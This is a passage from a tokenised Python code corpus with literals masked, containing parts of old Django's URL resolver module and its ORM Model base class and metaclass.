<EOL> try : <EOL> lookup_view = lookup_view . encode ( '<STR_LIT:ascii>' ) <EOL> mod_name , func_name = get_mod_func ( lookup_view ) <EOL> if func_name != '<STR_LIT>' : <EOL> lookup_view = getattr ( import_module ( mod_name ) , func_name ) <EOL> if not callable ( lookup_view ) : <EOL> raise AttributeError ( "<STR_LIT>" % ( mod_name , func_name ) ) <EOL> except ( ImportError , AttributeError ) : <EOL> if not can_fail : <EOL> raise <EOL> except UnicodeEncodeError : <EOL> pass <EOL> return lookup_view <EOL> get_callable = memoize ( get_callable , _callable_cache , <NUM_LIT:1> ) <EOL> def get_resolver ( urlconf ) : <EOL> if urlconf is None : <EOL> from django . conf import settings <EOL> urlconf = settings . ROOT_URLCONF <EOL> return RegexURLResolver ( r'<STR_LIT>' , urlconf ) <EOL> get_resolver = memoize ( get_resolver , _resolver_cache , <NUM_LIT:1> ) <EOL> def get_mod_func ( callback ) : <EOL> try : <EOL> dot = callback . rindex ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> return callback , '<STR_LIT>' <EOL> return callback [ : dot ] , callback [ dot + <NUM_LIT:1> : ] <EOL> class RegexURLPattern ( object ) : <EOL> def __init__ ( self , regex , callback , default_args = None , name = None ) : <EOL> self . regex = re . compile ( regex , re . UNICODE ) <EOL> if callable ( callback ) : <EOL> self . _callback = callback <EOL> else : <EOL> self . _callback = None <EOL> self . _callback_str = callback <EOL> self . default_args = default_args or { } <EOL> self . name = name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . name , self . regex . pattern ) <EOL> def add_prefix ( self , prefix ) : <EOL> """<STR_LIT>""" <EOL> if not prefix or not hasattr ( self , '<STR_LIT>' ) : <EOL> return <EOL> self . _callback_str = prefix + '<STR_LIT:.>' + self . _callback_str <EOL> def resolve ( self , path ) : <EOL> match = self . regex . search ( path ) <EOL> if match : <EOL> kwargs = match . groupdict ( ) <EOL> if kwargs : <EOL> args = ( ) <EOL> else : <EOL> args = match . groups ( ) <EOL> kwargs . update ( self . default_args ) <EOL> return self . callback , args , kwargs <EOL> def _get_callback ( self ) : <EOL> if self . _callback is not None : <EOL> return self . _callback <EOL> try : <EOL> self . _callback = get_callable ( self . _callback_str ) <EOL> except ImportError , e : <EOL> mod_name , _ = get_mod_func ( self . _callback_str ) <EOL> raise ViewDoesNotExist , "<STR_LIT>" % ( mod_name , str ( e ) ) <EOL> except AttributeError , e : <EOL> mod_name , func_name = get_mod_func ( self . _callback_str ) <EOL> raise ViewDoesNotExist , "<STR_LIT>" % ( func_name , mod_name , str ( e ) ) <EOL> return self . _callback <EOL> callback = property ( _get_callback ) <EOL> class RegexURLResolver ( object ) : <EOL> def __init__ ( self , regex , urlconf_name , default_kwargs = None , app_name = None , namespace = None ) : <EOL> self . regex = re . compile ( regex , re . UNICODE ) <EOL> self . urlconf_name = urlconf_name <EOL> if not isinstance ( urlconf_name , basestring ) : <EOL> self . _urlconf_module = self . urlconf_name <EOL> self . callback = None <EOL> self . default_kwargs = default_kwargs or { } <EOL> self . namespace = namespace <EOL> self . app_name = app_name <EOL> self . _reverse_dict = None <EOL> self . _namespace_dict = None <EOL> self . _app_dict = None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . urlconf_name , self . app_name , self . namespace , self . regex . pattern ) <EOL> def _populate ( self ) : <EOL> lookups = MultiValueDict ( ) <EOL> namespaces = { } <EOL> apps = { } <EOL> for pattern in reversed ( self . url_patterns ) : <EOL> p_pattern = pattern . regex . pattern <EOL> if p_pattern . startswith ( '<STR_LIT>' ) : <EOL> p_pattern = p_pattern [ <NUM_LIT:1> : ] <EOL> if isinstance ( pattern , RegexURLResolver ) : <EOL> if pattern . namespace : <EOL> namespaces [ pattern . namespace ] = ( p_pattern , pattern ) <EOL> if pattern . app_name : <EOL> apps . setdefault ( pattern . app_name , [ ] ) . append ( pattern . namespace ) <EOL> else : <EOL> parent = normalize ( pattern . regex . pattern ) <EOL> for name in pattern . reverse_dict : <EOL> for matches , pat in pattern . reverse_dict . getlist ( name ) : <EOL> new_matches = [ ] <EOL> for piece , p_args in parent : <EOL> new_matches . extend ( [ ( piece + suffix , p_args + args ) for ( suffix , args ) in matches ] ) <EOL> lookups . appendlist ( name , ( new_matches , p_pattern + pat ) ) <EOL> for namespace , ( prefix , sub_pattern ) in pattern . namespace_dict . items ( ) : <EOL> namespaces [ namespace ] = ( p_pattern + prefix , sub_pattern ) <EOL> for app_name , namespace_list in pattern . app_dict . items ( ) : <EOL> apps . setdefault ( app_name , [ ] ) . extend ( namespace_list ) <EOL> else : <EOL> bits = normalize ( p_pattern ) <EOL> lookups . appendlist ( pattern . callback , ( bits , p_pattern ) ) <EOL> lookups . appendlist ( pattern . name , ( bits , p_pattern ) ) <EOL> self . _reverse_dict = lookups <EOL> self . _namespace_dict = namespaces <EOL> self . _app_dict = apps <EOL> def _get_reverse_dict ( self ) : <EOL> if self . _reverse_dict is None : <EOL> self . _populate ( ) <EOL> return self . _reverse_dict <EOL> reverse_dict = property ( _get_reverse_dict ) <EOL> def _get_namespace_dict ( self ) : <EOL> if self . _namespace_dict is None : <EOL> self . _populate ( ) <EOL> return self . _namespace_dict <EOL> namespace_dict = property ( _get_namespace_dict ) <EOL> def _get_app_dict ( self ) : <EOL> if self . _app_dict is None : <EOL> self . _populate ( ) <EOL> return self . _app_dict <EOL> app_dict = property ( _get_app_dict ) <EOL> def resolve ( self , path ) : <EOL> tried = [ ] <EOL> match = self . regex . search ( path ) <EOL> if match : <EOL> new_path = path [ match . end ( ) : ] <EOL> for pattern in self . url_patterns : <EOL> try : <EOL> sub_match = pattern . resolve ( new_path ) <EOL> except Resolver404 , e : <EOL> sub_tried = e . args [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) <EOL> if sub_tried is not None : <EOL> tried . extend ( [ ( pattern . regex . pattern + '<STR_LIT:U+0020>' + t ) for t in sub_tried ] ) <EOL> else : <EOL> tried . append ( pattern . regex . pattern ) <EOL> else : <EOL> if sub_match : <EOL> sub_match_dict = dict ( [ ( smart_str ( k ) , v ) for k , v in match . groupdict ( ) . items ( ) ] ) <EOL> sub_match_dict . update ( self . default_kwargs ) <EOL> for k , v in sub_match [ <NUM_LIT:2> ] . iteritems ( ) : <EOL> sub_match_dict [ smart_str ( k ) ] = v <EOL> return sub_match [ <NUM_LIT:0> ] , sub_match [ <NUM_LIT:1> ] , sub_match_dict <EOL> tried . append ( pattern . regex . pattern ) <EOL> raise Resolver404 , { '<STR_LIT>' : tried , '<STR_LIT:path>' : new_path } <EOL> raise Resolver404 , { '<STR_LIT:path>' : path } <EOL> def _get_urlconf_module ( self ) : <EOL> try : <EOL> return self . _urlconf_module <EOL> except AttributeError : <EOL> self . _urlconf_module = import_module ( self . urlconf_name ) <EOL> return self . _urlconf_module <EOL> urlconf_module = property ( _get_urlconf_module ) <EOL> def _get_url_patterns ( self ) : <EOL> patterns = getattr ( self . urlconf_module , "<STR_LIT>" , self . urlconf_module ) <EOL> try : <EOL> iter ( patterns ) <EOL> except TypeError : <EOL> raise ImproperlyConfigured ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . urlconf_name ) <EOL> return patterns <EOL> url_patterns = property ( _get_url_patterns ) <EOL> def _resolve_special ( self , view_type ) : <EOL> callback = getattr ( self . urlconf_module , '<STR_LIT>' % view_type ) <EOL> mod_name , func_name = get_mod_func ( callback ) <EOL> try : <EOL> return getattr ( import_module ( mod_name ) , func_name ) , { } <EOL> except ( ImportError , AttributeError ) , e : <EOL> raise ViewDoesNotExist , "<STR_LIT>" % ( callback , str ( e ) ) <EOL> def resolve404 ( self ) : <EOL> return self . _resolve_special ( '<STR_LIT>' ) <EOL> def resolve500 ( self ) : <EOL> return self . _resolve_special ( '<STR_LIT>' ) <EOL> def reverse ( self , lookup_view , * args , ** kwargs ) : <EOL> if args and kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> lookup_view = get_callable ( lookup_view , True ) <EOL> except ( ImportError , AttributeError ) , e : <EOL> raise NoReverseMatch ( "<STR_LIT>" % ( lookup_view , e ) ) <EOL> possibilities = self . reverse_dict . getlist ( lookup_view ) <EOL> for possibility , pattern in possibilities : <EOL> for result , params in possibility : <EOL> if args : <EOL> if len ( args ) != len ( params ) : <EOL> continue <EOL> unicode_args = [ force_unicode ( val ) for val in args ] <EOL> candidate = result % dict ( zip ( params , unicode_args ) ) <EOL> else : <EOL> if set ( kwargs . keys ( ) ) != set ( params ) : <EOL> continue <EOL> unicode_kwargs = dict ( [ ( k , force_unicode ( v ) ) for ( k , v ) in kwargs . items ( ) ] ) <EOL> candidate = result % unicode_kwargs <EOL> if re . search ( u'<STR_LIT>' % pattern , candidate , re . UNICODE ) : <EOL> return candidate <EOL> raise NoReverseMatch ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( lookup_view , args , kwargs ) ) <EOL> def resolve ( path , urlconf = None ) : <EOL> return get_resolver ( urlconf ) . resolve ( path ) <EOL> def reverse ( viewname , urlconf = None , args = None , kwargs = None , prefix = None , current_app = None ) : <EOL> resolver = get_resolver ( urlconf ) <EOL> args = args or [ ] <EOL> kwargs = kwargs or { } <EOL> if prefix is None : <EOL> prefix = get_script_prefix ( ) <EOL> if not isinstance ( viewname , basestring ) : <EOL> view = viewname <EOL> else : <EOL> parts = viewname . split ( '<STR_LIT::>' ) <EOL> parts . reverse ( ) <EOL> view = parts [ <NUM_LIT:0> ] <EOL> path = parts [ <NUM_LIT:1> : ] <EOL> resolved_path = [ ] <EOL> while path : <EOL> ns = path . pop ( ) <EOL> try : <EOL> app_list = resolver . app_dict [ ns ] <EOL> if current_app and current_app in app_list : <EOL> ns = current_app <EOL> elif ns not in app_list : <EOL> ns = app_list [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> try : <EOL> extra , resolver = resolver . namespace_dict [ ns ] <EOL> resolved_path . append ( ns ) <EOL> prefix = prefix + extra <EOL> except KeyError , key : <EOL> if resolved_path : <EOL> raise NoReverseMatch ( "<STR_LIT>" % ( key , '<STR_LIT::>' . join ( resolved_path ) ) ) <EOL> else : <EOL> raise NoReverseMatch ( "<STR_LIT>" % key ) <EOL> return iri_to_uri ( u'<STR_LIT>' % ( prefix , resolver . reverse ( view , <EOL> * args , ** kwargs ) ) ) <EOL> def clear_url_caches ( ) : <EOL> global _resolver_cache <EOL> global _callable_cache <EOL> _resolver_cache . clear ( ) <EOL> _callable_cache . clear ( ) <EOL> def set_script_prefix ( prefix ) : <EOL> """<STR_LIT>""" <EOL> if not prefix . endswith ( '<STR_LIT:/>' ) : <EOL> prefix += '<STR_LIT:/>' <EOL> _prefixes [ currentThread ( ) ] = prefix <EOL> def get_script_prefix ( ) : <EOL> """<STR_LIT>""" <EOL> return _prefixes . get ( currentThread ( ) , u'<STR_LIT:/>' ) </s>
<s> import copy <EOL> import types <EOL> import sys <EOL> import os <EOL> from itertools import izip <EOL> try : <EOL> set <EOL> except NameError : <EOL> from sets import Set as set <EOL> import django . db . models . manager <EOL> from django . core . exceptions import ObjectDoesNotExist , MultipleObjectsReturned , FieldError <EOL> from django . db . models . fields import AutoField , FieldDoesNotExist <EOL> from django . db . models . fields . related import OneToOneRel , ManyToOneRel , OneToOneField <EOL> from django . db . models . query import delete_objects , Q <EOL> from django . db . models . query_utils import CollectedObjects , DeferredAttribute <EOL> from django . db . models . options import Options <EOL> from django . db import connection , transaction , DatabaseError <EOL> from django . db . models import signals <EOL> from django . db . models . loading import register_models , get_model <EOL> from django . utils . functional import curry <EOL> from django . utils . encoding import smart_str , force_unicode , smart_unicode <EOL> from django . conf import settings <EOL> class ModelBase ( type ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> super_new = super ( ModelBase , cls ) . __new__ <EOL> parents = [ b for b in bases if isinstance ( b , ModelBase ) ] <EOL> if not parents : <EOL> return super_new ( cls , name , bases , attrs ) <EOL> module = attrs . pop ( '<STR_LIT>' ) <EOL> new_class = super_new ( cls , name , bases , { '<STR_LIT>' : module } ) <EOL> attr_meta = attrs . pop ( '<STR_LIT:Meta>' , None ) <EOL> abstract = getattr ( attr_meta , '<STR_LIT>' , False ) <EOL> if not attr_meta : <EOL> meta = getattr ( new_class , '<STR_LIT:Meta>' , None ) <EOL> else : <EOL> meta = attr_meta <EOL> base_meta = getattr ( new_class , '<STR_LIT>' , None ) <EOL> if getattr ( meta , '<STR_LIT>' , None ) is None : <EOL> model_module = sys . modules [ new_class . __module__ ] <EOL> kwargs = { "<STR_LIT>" : model_module . __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:2> ] } <EOL> else : <EOL> kwargs = { } <EOL> new_class . add_to_class ( '<STR_LIT>' , Options ( meta , ** kwargs ) ) <EOL> if not abstract : <EOL> new_class . add_to_class ( '<STR_LIT>' , <EOL> subclass_exception ( '<STR_LIT>' , ObjectDoesNotExist , module ) ) <EOL> new_class . add_to_class ( '<STR_LIT>' , <EOL> subclass_exception ( '<STR_LIT>' , MultipleObjectsReturned , module ) ) <EOL> if base_meta and not base_meta . abstract : <EOL> if not hasattr ( meta , '<STR_LIT>' ) : <EOL> new_class . _meta . ordering = base_meta . ordering <EOL> if not hasattr ( meta , '<STR_LIT>' ) : <EOL> new_class . _meta . get_latest_by = base_meta . get_latest_by <EOL> is_proxy = new_class . _meta . proxy <EOL> if getattr ( new_class , '<STR_LIT>' , None ) : <EOL> if not is_proxy : <EOL> new_class . _default_manager = None <EOL> new_class . _base_manager = None <EOL> else : <EOL> new_class . _default_manager = new_class . _default_manager . _copy_to_model ( new_class ) <EOL> new_class . _base_manager = new_class . _base_manager . _copy_to_model ( new_class ) <EOL> m = get_model ( new_class . _meta . app_label , name , False ) <EOL> if m is not None : <EOL> return m <EOL> for obj_name , obj in attrs . items ( ) : <EOL> new_class . add_to_class ( obj_name , obj ) <EOL> new_fields = new_class . _meta . local_fields + new_class . _meta . local_many_to_many + new_class . _meta . virtual_fields <EOL> field_names = set ( [ f . name for f in new_fields ] ) <EOL> if is_proxy : <EOL> base = None <EOL> for parent in [ cls for cls in parents if hasattr ( cls , '<STR_LIT>' ) ] : <EOL> if parent . _meta . abstract : <EOL> if parent . _meta . fields : <EOL> raise TypeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> continue <EOL> if base is not None : <EOL> raise TypeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> base = parent <EOL> if base is None : <EOL> raise TypeError ( "<STR_LIT>" % name ) <EOL> if ( new_class . _meta . local_fields or <EOL> new_class . _meta . local_many_to_many ) : <EOL> raise FieldError ( "<STR_LIT>" <EOL> % name ) <EOL> while base . _meta . proxy : <EOL> base = base . _meta . proxy_for_model <EOL> new_class . _meta . setup_proxy ( base ) <EOL> o2o_map = dict ( [ ( f . rel . to , f ) for f in new_class . _meta . local_fields <EOL> if isinstance ( f , OneToOneField ) ] ) <EOL> for base in parents : <EOL> original_base = base <EOL> if not hasattr ( base , '<STR_LIT>' ) : <EOL> continue <EOL> parent_fields = base . _meta . local_fields + base . _meta . local_many_to_many <EOL> for field in parent_fields : <EOL> if field . name in field_names : <EOL> raise FieldError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( field . name , name , base . __name__ ) ) <EOL> if not base . _meta . abstract : <EOL> while base . _meta . proxy : <EOL> base = base . _meta . proxy_for_model <EOL> if base in o2o_map : <EOL> field = o2o_map [ base ] <EOL> elif not is_proxy : <EOL> attr_name = '<STR_LIT>' % base . _meta . module_name <EOL> field = OneToOneField ( base , name = attr_name , <EOL> auto_created = True , parent_link = True ) <EOL> new_class . add_to_class ( attr_name , field ) <EOL> else : <EOL> field = None <EOL> new_class . _meta . parents [ base ] = field <EOL> else : <EOL> for field in parent_fields : <EOL> new_class . add_to_class ( field . name , copy . deepcopy ( field ) ) <EOL> new_class . _meta . parents . update ( base . _meta . parents ) <EOL> new_class . copy_managers ( base . _meta . abstract_managers ) <EOL> if is_proxy : <EOL> new_class . copy_managers ( original_base . _meta . concrete_managers ) <EOL> for field in base . _meta . virtual_fields : <EOL> if base . _meta . abstract and field . name in field_names : <EOL> raise FieldError ( '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' % ( field . name , name , base . __name__ ) ) <EOL> new_class . add_to_class ( field . name , copy . deepcopy ( field ) ) <EOL> if abstract : <EOL> attr_meta . abstract = False <EOL> new_class . Meta = attr_meta <EOL> return new_class <EOL> new_class . _prepare ( ) <EOL> register_models ( new_class . _meta . app_label , new_class ) <EOL> return get_model ( new_class . _meta . app_label , name , False ) <EOL> def copy_managers ( cls , base_managers ) : <EOL> base_managers . sort ( ) <EOL> for _ , mgr_name , manager in base_managers : <EOL> val = getattr ( cls , mgr_name , None ) <EOL> if not val or val is manager : <EOL> new_manager = manager . _copy_to_model ( cls ) <EOL> cls . add_to_class ( mgr_name , new_manager ) <EOL> def add_to_class ( cls , name , value ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> value . contribute_to_class ( cls , name ) <EOL> else : <EOL> setattr ( cls , name , value ) <EOL> def _prepare ( cls ) : <EOL> """<STR_LIT>""" <EOL> opts = cls . _meta <EOL> opts . _prepare ( cls ) <EOL> if opts . order_with_respect_to : <EOL> cls . get_next_in_order = curry ( cls . _get_next_or_previous_in_order , is_next = True ) <EOL> cls . get_previous_in_order = curry ( cls . _get_next_or_previous_in_order , is_next = False ) <EOL> setattr ( opts . order_with_respect_to . rel . to , '<STR_LIT>' % cls . __name__ . lower ( ) , curry ( method_get_order , cls ) ) <EOL> setattr ( opts . order_with_respect_to . rel . to , '<STR_LIT>' % cls . __name__ . lower ( ) , curry ( method_set_order , cls ) ) <EOL> if cls . __doc__ is None : <EOL> cls . __doc__ = "<STR_LIT>" % ( cls . __name__ , "<STR_LIT:U+002CU+0020>" . join ( [ f . attname for f in opts . fields ] ) ) <EOL> if hasattr ( cls , '<STR_LIT>' ) : <EOL> cls . get_absolute_url = curry ( get_absolute_url , opts , cls . get_absolute_url ) <EOL> signals . class_prepared . send ( sender = cls ) <EOL> class Model ( object ) : <EOL> __metaclass__ = ModelBase <EOL> _deferred = False <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> signals . pre_init . send ( sender = self . __class__ , args = args , kwargs = kwargs ) <EOL> args_len = len ( args ) <EOL> if args_len > len ( self . _meta . fields ) : <EOL> raise IndexError ( "<STR_LIT>" ) <EOL> fields_iter = iter ( self . _meta . fields ) <EOL> if not kwargs : <EOL> for val , field in izip ( args , fields_iter ) : <EOL> setattr ( self , field . attname , val ) <EOL> else : <EOL> for val , field in izip ( args , fields_iter ) : <EOL> setattr ( self , field . attname , val ) <EOL> kwargs . pop ( field . name , None ) <EOL> if isinstance ( field . rel , ManyToOneRel ) : <EOL> kwargs . pop ( field . attname , None ) <EOL> for field in fields_iter : <EOL> is_related_object = False <EOL> if ( field . attname not in kwargs and <EOL> isinstance ( self . __class__ . __dict__ . get ( field . attname ) , DeferredAttribute ) ) : <EOL> continue <EOL> if kwargs : <EOL> if isinstance ( field . rel , ManyToOneRel ) : <EOL> try : <EOL> rel_obj = kwargs . pop ( field . name ) <EOL> is_related_object = True <EOL> except KeyError : <EOL> try : <EOL> val = kwargs . pop ( field . attname ) <EOL> except KeyError : <EOL> val = field . get_default ( ) <EOL> else : <EOL> if rel_obj is None and field . null : <EOL> val = None <EOL> else : <EOL> val = kwargs . pop ( field . attname , field . get_default ( ) ) <EOL> else : <EOL> val = field . get_default ( ) <EOL> if is_related_object : <EOL> setattr ( self , field . name , rel_obj ) <EOL> else : <EOL> setattr ( self , field . attname , val ) <EOL> if kwargs : <EOL> for prop in kwargs . keys ( ) : <EOL> try : <EOL> if isinstance ( getattr ( self . __class__ , prop ) , property ) : <EOL> setattr ( self , prop , kwargs . pop ( prop ) ) <EOL> except AttributeError : <EOL> pass <EOL> if kwargs : <EOL> raise TypeError , "<STR_LIT>" % kwargs . keys ( ) [ <NUM_LIT:0> ] <EOL> signals . post_init . send ( sender = self . __class__ , instance = self ) <EOL> def __repr__ ( self ) : <EOL> try : <EOL> u = unicode ( self ) <EOL> except ( UnicodeEncodeError , UnicodeDecodeError ) : <EOL> u = '<STR_LIT>' <EOL> return smart_str ( u'<STR_LIT>' % ( self . __class__ . __name__ , u ) ) <EOL> def __str__ ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return force_unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> return '<STR_LIT>' % self . __class__ . __name__ <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . _get_pk_val ( ) == other . _get_pk_val ( ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _get_pk_val ( ) ) <EOL> def __reduce__ ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . __dict__ <EOL> if not self . _deferred : <EOL> return ( self . __class__ , ( ) , data ) <EOL> defers = [ ] <EOL> pk_val = None <EOL> for field in self . _meta . fields : <EOL> if isinstance ( self . __class__ . __dict__ . get ( field . attname ) , <EOL> DeferredAttribute ) : <EOL> defers . append ( field . attname ) <EOL> if pk_val is None : <EOL> obj = self . __class__ . __dict__ [ field . attname ] <EOL> model = obj . model_ref ( ) <EOL> return ( model_unpickle , ( model , defers ) , data ) <EOL> def _get_pk_val ( self , meta = None ) : <EOL> if not meta : <EOL> meta = self . _meta <EOL> return getattr ( self , meta . pk . attname ) <EOL> def _set_pk_val ( self , value ) : <EOL> return setattr ( self , self . _meta . pk . attname , value ) <EOL> pk = property ( _get_pk_val , _set_pk_val ) <EOL> def serializable_value ( self , field_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> field = self . _meta . get_field_by_name ( field_name ) [ <NUM_LIT:0> ] <EOL> except FieldDoesNotExist : <EOL> return getattr ( self , field_name ) <EOL> return getattr ( self , field . attname ) <EOL> def save ( self , force_insert = False , force_update = False ) : <EOL> """<STR_LIT>""" <EOL> if force_insert and force_update : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . save_base ( force_insert = force_insert , force_update = force_update ) <EOL> save . alters_data = True <EOL> def save_base ( self , raw = False , cls = None , origin = None , <EOL> force_insert = False , force_update = False ) : <EOL> """<STR_LIT>""" <EOL> assert not ( force_insert and force_update ) <EOL> if cls is None : <EOL> cls = self . __class__ <EOL> meta = cls . _meta <EOL> if not meta . proxy : <EOL> origin = cls <EOL> else : <EOL> meta = cls . _meta <EOL> if origin : <EOL> signals . pre_save . send ( sender = origin , instance = self , raw = raw ) <EOL> if not raw or meta . proxy : <EOL> if meta . proxy : <EOL> org = cls <EOL> else : <EOL> org = None <EOL> for parent , field in meta . parents . items ( ) : <EOL> if field and getattr ( self , parent . _meta . pk . attname ) is None and getattr ( self , field . attname ) is not None : <EOL> setattr ( self , parent . _meta . pk . attname , getattr ( self , field . attname ) ) <EOL> self . save_base ( cls = parent , origin = org ) <EOL> if field : <EOL> setattr ( self , field . attname , self . _get_pk_val ( parent . _meta ) ) <EOL> if meta . proxy : <EOL> return <EOL> if not meta . proxy : <EOL> non_pks = [ f for f in meta . local_fields if not f . primary_key ] <EOL> pk_val = self . _get_pk_val ( meta ) <EOL> pk_set = pk_val is not None <EOL> record_exists = True <EOL> manager = cls . _base_manager <EOL> if pk_set : <EOL> if ( force_update or ( not force_insert and <EOL> manager . filter ( pk = pk_val ) . extra ( select = { '<STR_LIT:a>' : <NUM_LIT:1> } ) . values ( '<STR_LIT:a>' ) . order_by ( ) ) ) : <EOL> if force_update or non_pks : <EOL> values = [ ( f , None , ( raw and getattr ( self , f . attname ) or f . pre_save ( self , False ) ) ) for f in non_pks ] <EOL> rows = manager . filter ( pk = pk_val ) . _update ( values ) <EOL> if force_update and not rows : <EOL> raise DatabaseError ( "<STR_LIT>" ) <EOL> else : <EOL> record_exists = False <EOL> if not pk_set or not record_exists : <EOL> if not pk_set : <EOL> if force_update : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> values = [ ( f , f . get_db_prep_save ( raw and getattr ( self , f . attname ) or f . pre_save ( self , True ) ) ) for f in meta . local_fields if not isinstance ( f , AutoField ) ] <EOL> else : <EOL> values = [ ( f , f . get_db_prep_save ( raw and getattr ( self , f . attname ) or f . pre_save ( self , True ) ) ) for f in meta . local_fields ] <EOL> if meta . order_with_respect_to : <EOL> field = meta . order_with_respect_to <EOL> values . append ( ( meta . get_field_by_name ( '<STR_LIT>' ) [ <NUM_LIT:0> ] , manager . filter ( ** { field . name : getattr ( self , field . attname ) } ) . count ( ) ) ) <EOL> record_exists = False <EOL> update_pk = bool ( meta . has_auto_field and not pk_set ) <EOL> if values : <EOL> result = manager . _insert ( values , return_id = update_pk ) <EOL> else : <EOL> result = manager . _insert ( [ ( meta . pk , connection . ops . pk_default_value ( ) ) ] , return_id = update_pk , raw_values = True ) <EOL> if update_pk : <EOL> setattr ( self , meta . pk . attname , result ) <EOL> transaction . commit_unless_managed ( ) <EOL> if origin : <EOL> signals . post_save . send ( sender = origin , instance = self , <EOL> created = ( not record_exists ) , raw = raw ) <EOL> save_base . alters_data = True <EOL> def _collect_sub_objects ( self , seen_objs , parent = None , nullable = False ) : <EOL> """<STR_LIT>""" <EOL> pk_val = self . _get_pk_val ( ) <EOL> if seen_objs . add ( self . __class__ , pk_val , self , parent , nullable ) : <EOL> return <EOL> for related in self . _meta . get_all_related_objects ( ) : <EOL> rel_opts_name = related . get_accessor_name ( ) <EOL> if isinstance ( related . field . rel , OneToOneRel ) : <EOL> try : <EOL> sub_obj = getattr ( self , rel_opts_name ) <EOL> except ObjectDoesNotExist : <EOL> pass <EOL> else : <EOL> sub_obj . _collect_sub_objects ( seen_objs , self . __class__ , related . field . null ) <EOL> else : <EOL> for cls in self . __class__ . mro ( ) : <EOL> if rel_opts_name in cls . __dict__ : <EOL> rel_descriptor = cls . __dict__ [ rel_opts_name ] <EOL> break <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> delete_qs = rel_descriptor . delete_manager ( self ) . all ( ) <EOL> for sub_obj in delete_qs : <EOL> sub_obj . _collect_sub_objects ( seen_objs , self . __class__ , related . field . null ) <EOL> parent_stack = [ p for p in self . _meta . parents . values ( ) if p is not None ] <EOL> while parent_stack : <EOL> link = parent_stack . pop ( ) <EOL> parent_obj = getattr ( self , link . name ) <EOL> if parent_obj . _meta . parents : <EOL> parent_stack . extend ( parent_obj . _meta . parents . values ( ) ) <EOL> continue <EOL> parent_obj . _collect_sub_objects ( seen_objs ) <EOL> def delete ( self ) : <EOL> assert self . _get_pk_val ( ) is not None , "<STR_LIT>" % ( self . _meta . object_name , self . _meta . pk . attname ) <EOL> seen_objs = CollectedObjects ( ) <EOL> self . _collect_sub_objects ( seen_objs ) <EOL> delete_objects ( seen_objs ) <EOL> delete . alters_data = True <EOL> def _get_FIELD_display ( self , field ) : <EOL> value = getattr ( self , field . attname ) <EOL> return force_unicode ( dict ( field . flatchoices ) . get ( value , value ) , strings_only = True ) <EOL> def _get_next_or_previous_by_FIELD ( self , field , is_next , ** kwargs ) : <EOL> op = is_next and '<STR_LIT>' or '<STR_LIT>' <EOL> order = not is_next and '<STR_LIT:->' or '<STR_LIT>' <EOL> param = smart_str ( getattr ( self , field . attname ) ) <EOL> q = Q ( ** { '<STR_LIT>' % ( field . name , op ) : param } ) <EOL> q = q | Q ( ** { field . name : param , '<STR_LIT>' % op : self . pk } ) <EOL> qs = self . __class__ . _default_manager . filter ( ** kwargs ) . filter ( q ) . order_by ( '<STR_LIT>' % ( order , field . name ) , '<STR_LIT>' % order ) <EOL> try : <EOL> return qs [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> raise self . DoesNotExist , "<STR_LIT>" % self . __class__ . _meta . object_name <EOL> def _get_next_or_previous_in_order ( self , is_next ) : <EOL> cachename = "<STR_LIT>" % is_next <EOL> if not hasattr ( self , cachename ) : <EOL> qn = connection . ops . quote_name <EOL> op = is_next and '<STR_LIT:>>' or '<STR_LIT:<>' <EOL> order = not is_next and '<STR_LIT>' or '<STR_LIT>' <EOL> order_field = self . _meta . order_with_respect_to <EOL> where = [ '<STR_LIT>' % ( qn ( '<STR_LIT>' ) , op , qn ( '<STR_LIT>' ) , <EOL> qn ( self . _meta . db_table ) , qn ( self . _meta . pk . column ) ) ] <EOL> params = [ self . pk ] <EOL> obj = self . _default_manager . filter ( ** { order_field . name : getattr ( self , order_field . attname ) } ) . extra ( where = where , params = params ) . order_by ( order ) [ : <NUM_LIT:1> ] . get ( ) <EOL> setattr ( self , cachename , obj ) <EOL> return getattr ( self , cachename ) <EOL> def prepare_database_save ( self , unused ) : <EOL> return self . pk <EOL> def method_set_order ( ordered_obj , self , id_list ) : <EOL> rel_val = getattr ( self , ordered_obj . _meta . order_with_respect_to . rel . field_name ) <EOL> order_name = ordered_obj . _meta . order_with_respect_to . name <EOL> for i , j in enumerate ( id_list ) : <EOL> ordered_obj . objects . filter ( ** { '<STR_LIT>' : j , order_name : rel_val } ) . update ( _order = i ) <EOL> transaction . commit_unless_managed ( ) <EOL> def method_get_order ( ordered_obj , self ) : <EOL> rel_val = getattr ( self , ordered_obj . _meta . order_with_respect_to . rel . field_name ) <EOL> order_name = ordered_obj . _meta . order_with_respect_to . name <EOL> pk_name = ordered_obj . _meta . pk . name <EOL> return [ r [ pk_name ] for r in <EOL> ordered_obj . objects . filter ( ** { order_name : rel_val } ) . values ( pk_name ) ] <EOL> def get_absolute_url ( opts , func , self , * args , ** kwargs ) : <EOL> return settings . ABSOLUTE_URL_OVERRIDES . get ( 